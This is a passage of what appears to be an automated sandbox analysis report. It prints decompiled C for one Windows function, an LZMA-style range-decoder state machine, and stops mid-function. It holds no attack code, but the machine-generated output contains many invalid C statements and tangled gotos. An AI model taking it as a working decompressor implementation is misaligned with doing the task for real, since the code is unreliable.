                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00406CE2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
